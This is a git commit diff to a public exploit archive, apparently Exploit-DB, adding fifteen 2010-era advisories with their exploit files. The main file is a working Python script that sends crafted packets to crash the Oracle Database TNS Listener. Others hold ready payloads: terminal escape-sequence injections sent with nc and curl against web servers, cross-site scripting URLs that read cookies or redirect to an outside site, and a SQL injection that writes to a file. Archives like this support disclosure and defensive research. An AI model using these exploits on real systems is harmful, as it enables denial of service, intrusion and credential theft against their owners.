Updated 05_27_2014

2014-05-27 04:36:34 +00:00 · 2014-05-27 04:36:34 +00:00 · 1a66c6956f
commit 1a66c6956f
parent 359a8017ee
16 changed files with 324 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30176,3 +30176,18 @@ id,file,description,date,author,platform,type,port
 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
 33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0
 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
+33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
+33500,platforms/multiple/remote/33500.txt,"mini_httpd <= 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0
+33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0
+33502,platforms/windows/remote/33502.txt,"Yaws <= 1.55 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0
+33503,platforms/multiple/remote/33503.txt,"Orion Application Server <= 2.0.7 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability",2010-01-12,Red-D3v1L,php,webapps,0
+33506,platforms/multiple/dos/33506.py,"Oracle Database CVE-2010-0071 Remote Listener Memory Corruption Vulnerability",2010-01-12,"Dennis Yurichev",multiple,dos,0
+33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x 'search.php' Cross-Site Scripting Vulnerability",2010-01-12,Sora,php,webapps,0
+33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0
+33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
+33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
+33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
--- a/platforms/linux/local/33508.txt
+++ b/platforms/linux/local/33508.txt
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/37776/info
+
+GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command.
+
+Attackers can exploit this issue to execute arbitrary commands in a bash terminal; other attacks may also be possible. 
+
+The following example is available:
+
+1. mkdir $(echo -e 'couc\x08\x08asd')
+2. ls
+
+Displays:
+coasd/
+
+Expected:
+couc??asd/ 
--- a/platforms/multiple/dos/33506.py
+++ b/platforms/multiple/dos/33506.py
@ -0,0 +1,156 @@
+source: http://www.securityfocus.com/bid/37728/info
+
+Oracle Database is prone to a remote memory-corruption vulnerability in Listener.
+
+The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker does not require privileges to exploit this vulnerability.
+
+This vulnerability affects the following supported versions:
+9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7 
+
+# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash
+
+# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt
+# to allocate huge memory block and copy *something* to it.
+
+# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95))
+# TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020
+# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab))
+
+# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)
+# If I correct, nsglvcrt() function is involved in new service creation.
+
+# Successfully crashed:
+#  Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied
+#  Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied
+#  Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied
+#  Oracle RDBMS 10.2.0.2 Linux x86
+# Not crashed:
+#  Oracle RDBMS 11.2 Linux x86
+
+# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>
+
+# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):
+# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html
+
+from sys import *
+from socket import *
+
+sockobj = socket(AF_INET, SOCK_STREAM)
+
+sockobj.connect ((argv[1], 1521))
+
+sockobj.send(
+	  "\x00\x68\x00\x00\x01\x00\x00\x00"
+	  "\x01\x3A\x01\x2C\x00\x00\x20\x00"
+	  "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
+	  "\x00\x2E\x00\x3A\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x28\x43\x4F\x4E\x4E\x45"
+	  "\x43\x54\x5F\x44\x41\x54\x41\x3D"
+	  "\x28\x43\x4F\x4D\x4D\x41\x4E\x44"
+	  "\x3D\x73\x65\x72\x76\x69\x63\x65"
+	  "\x5F\x72\x65\x67\x69\x73\x74\x65"
+	  "\x72\x5F\x4E\x53\x47\x52\x29\x29"
+)
+
+data=sockobj.recv(102400)
+
+sockobj.send(
+	  "\x02\xDE\x00\x00\x06\x00\x00\x00"
+	  "\x00\x00\x00\x00\x02\xD4\x20\x08"
+	  "\xFF\x03\x01\x00\x12\x34\x34\x34"
+	  "\x34\x34\x78\x10\x10\x32\x10\x32"
+	  "\x10\x32\x10\x32\x10\x32\x54\x76"
+	  "\x00\x78\x10\x32\x54\x76\x44\x00"
+	  "\x00\x80\x02\x00\x00\x00\x00\x04"
+	  "\x00\x00\x70\xE4\xA5\x09\x90\x00"
+	  "\x23\x00\x00\x00\x42\x45\x43\x37"
+	  "\x36\x43\x32\x43\x43\x31\x33\x36"
+	  "\x2D\x35\x46\x39\x46\x2D\x45\x30"
+	  "\x33\x34\x2D\x30\x30\x30\x33\x42"
+	  "\x41\x31\x33\x37\x34\x42\x33\x03"
+	  "\x00\x65\x00\x01\x00\x01\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x64\x02"
+	  "\x00\x80\x05\x00\x00\x00\x00\x04"
+	  "\x00\x00\x00\x00\x00\x00\x01\x00"
+	  "\x00\x00\x10\x00\x00\x00\x02\x00"
+	  "\x00\x00\x84\xC3\xCC\x07\x01\x00"
+	  "\x00\x00\x84\x2F\xA6\x09\x00\x00"
+	  "\x00\x00\x44\xA5\xA2\x09\x25\x98"
+	  "\x18\xE9\x28\x50\x4F\x28\xBB\xAC"
+	  "\x15\x56\x8E\x68\x1D\x6D\x05\x00"
+	  "\x00\x00\xFC\xA9\x36\x22\x0F\x00"
+	  "\x00\x00\x60\x30\xA6\x09\x0A\x00"
+	  "\x00\x00\x64\x00\x00\x00\x00\x00"
+	  "\x00\x00\xAA\x00\x00\x00\x00\x01"
+	  "\x00\x00\x17\x00\x00\x00\x78\xC3"
+	  "\xCC\x07\x6F\x72\x63\x6C\x00\x28"
+	  "\x48\x4F\x53\x54\x3D\x77\x69\x6E"
+	  "\x32\x30\x30\x33\x29\x00\x01\x00"
+	  "\x00\x00\x58\x00\x00\x00\x01\x00"
+	  "\x00\x00\x50\xC5\x2F\x22\x02\x00"
+	  "\x00\x00\x34\xC5\x2F\x22\x00\x00"
+	  "\x00\x00\x9C\xC5\xCC\x07\x6F\x72"
+	  "\x63\x6C\x5F\x58\x50\x54\x00\x09"
+	  "\x00\x00\x00\x50\xC5\x2F\x22\x04"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x34"
+	  "\xC5\xCC\x07\x6F\x72\x63\x6C\x5F"
+	  "\x58\x50\x54\x00\x01\x00\x00\x00"
+	  "\x05\x00\x00\x00\x01\x00\x00\x00"
+	  "\x84\xC5\x2F\x22\x02\x00\x00\x00"
+	  "\x68\xC5\x2F\x22\x00\x00\x00\x00"
+	  "\xA4\xA5\xA2\x09\x6F\x72\x63\x6C"
+	  "\x00\x05\x00\x00\x00\x84\xC5\x2F"
+	  "\x22\x04\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\xFC\xC4\xCC\x07\x6F\x72\x63"
+	  "\x6C\x00\x01\x00\x00\x00\x10\x00"
+	  "\x00\x00\x02\x00\x00\x00\xBC\xC3"
+	  "\xCC\x07\x04\x00\x00\x00\xB0\x2F"
+	  "\xA6\x09\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x89\xC0\xB1\xC3\x08\x1D"
+	  "\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7"
+	  "\x66\x6D\x0A\x00\x00\x00\x78\x2B"
+	  "\xBC\x04\x7F\x00\x00\x00\x64\xA7"
+	  "\xA2\x09\x0D\x00\x00\x00\x20\x2C"
+	  "\xBC\x04\x11\x00\x00\x00\x95\x00"
+	  "\x00\x00\x02\x20\x00\x80\x03\x00"
+	  "\x00\x00\x98\xC5\x2F\x22\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x0A\x00"
+	  "\x00\x00\xB0\xC3\xCC\x07\x44\x45"
+	  "\x44\x49\x43\x41\x54\x45\x44\x00"
+	  "\x28\x41\x44\x44\x52\x45\x53\x53"
+	  "\x3D\x28\x50\x52\x4F\x54\x4F\x43"
+	  "\x4F\x4C\x3D\x42\x45\x51\x29\x28"
+	  "\x50\x52\x4F\x47\x52\x41\x4D\x3D"
+	  "\x43\x3A\x5C\x61\x70\x70\x5C\x41"
+	  "\x64\x6D\x69\x6E\x69\x73\x74\x72"
+	  "\x61\x74\x6F\x72\x5C\x70\x72\x6F"
+	  "\x64\x75\x63\x74\x5C\x31\x31\x2E"
+	  "\x31\x2E\x30\x5C\x64\x62\x5F\x31"
+	  "\x5C\x62\x69\x6E\x5C\x6F\x72\x61"
+	  "\x63\x6C\x65\x2E\x65\x78\x65\x29"
+	  "\x28\x41\x52\x47\x56\x30\x3D\x6F"
+	  "\x72\x61\x63\x6C\x65\x6F\x72\x63"
+	  "\x6C\x29\x28\x41\x52\x47\x53\x3D"
+	  "\x27\x28\x4C\x4F\x43\x41\x4C\x3D"
+	  "\x4E\x4F\x29\x27\x29\x29\x00\x4C"
+	  "\x4F\x43\x41\x4C\x20\x53\x45\x52"
+	  "\x56\x45\x52\x00\x68\xC5\x2F\x22"
+	  "\x34\xC5\x2F\x22\x00\x00\x00\x00"
+	  "\x05\x00\x00\x00\x84\xC5\x2F\x22"
+	  "\x04\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\xFC\xC4\xCC\x07\x6F\x72\x63\x6C"
+	  "\x00\x09\x00\x00\x00\x50\xC5\x2F"
+	  "\x22\x04\x00\x00\x00\x00\x00\x00"
+	  "\x00\x00\x00\x00\x00\x00\x00\x00"
+	  "\x00\x34\xC5\xCC\x07\x6F\x72\x63"
+	  "\x6C\x5F\x58\x50\x54\x00"        
+)
+
+sockobj.close()
+
--- a/platforms/multiple/remote/33497.txt
+++ b/platforms/multiple/remote/33497.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37712/info
+
+AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+AOLServer 4.5.1 is vulnerable; other versions may also be affected.
+
+The following example is available:
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc www.example.com 80 < payload
+
--- a/platforms/multiple/remote/33498.txt
+++ b/platforms/multiple/remote/33498.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37713/info
+
+Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Varnish 2.0.6 is vulnerable; other versions may also be affected. 
+
+The following example is available:
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload 
--- a/platforms/multiple/remote/33499.txt
+++ b/platforms/multiple/remote/33499.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37714/info
+
+Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected. 
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
--- a/platforms/multiple/remote/33500.txt
+++ b/platforms/multiple/remote/33500.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37714/info
+ 
+Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
+ 
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+ 
+This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected. 
+
+curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload 
--- a/platforms/multiple/remote/33503.txt
+++ b/platforms/multiple/remote/33503.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37717/info
+
+Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Orion Application Server 2.0.7 is vulnerable; other versions may also be affected. 
+
+
+curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload 
--- a/platforms/multiple/remote/33504.txt
+++ b/platforms/multiple/remote/33504.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37718/info
+
+Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected.
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a 
--- a/platforms/multiple/webapps/33511.txt
+++ b/platforms/multiple/webapps/33511.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37802/info
+
+Zenoss is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zenoss 2.3.3 is affected; other versions may be vulnerable as well. 
+
+http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z" 
--- a/platforms/php/webapps/33505.txt
+++ b/platforms/php/webapps/33505.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37721/info
+
+Docmint is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other versions may be affected as well. 
+
+http://www.example.com/index.php?id='"><script>alert(document.cookie)</script>
+http://www.example.com/index.php?id=<marquee><font color=Red size=16>Th3 RDX/font></marquee>
+http://www.example.com/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect in corso...</BODY></HTML> 
--- a/platforms/php/webapps/33507.txt
+++ b/platforms/php/webapps/33507.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37752/info
+
+Simple PHP Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Simple PHP Blog 0.5.11 is vulnerable; other versions may also be affected. 
+
+http://serverwww.example.com/blog/search.php?q="><H2>Hacked by Sora</H2>
--- a/platforms/php/webapps/33509.txt
+++ b/platforms/php/webapps/33509.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37798/info
+
+The Joomla! 'com_artistavenue' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/index.php?option=com_tienda&task=verproducto&categoria=[XSS] 
--- a/platforms/php/webapps/33510.txt
+++ b/platforms/php/webapps/33510.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37800/info
+
+Tribisur is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example URI is available:
+
+http://www.example.com/forum.php?action=liste&cat=[Xss Vuln] 
--- a/platforms/windows/remote/33501.txt
+++ b/platforms/windows/remote/33501.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37715/info
+
+Cherokee is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Cherokee 0.99.30 and prior are vulnerable.
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a 
--- a/platforms/windows/remote/33502.txt
+++ b/platforms/windows/remote/33502.txt
@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/37716/info
+
+Yaws is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
+
+Attackers can exploit this issue to execute arbitrary commands in a terminal.
+
+Yaws 1.85 is vulnerable; other versions may also be affected. 
+
+The following example is available:
+
+curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
+echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
+nc localhost 80 < payload
+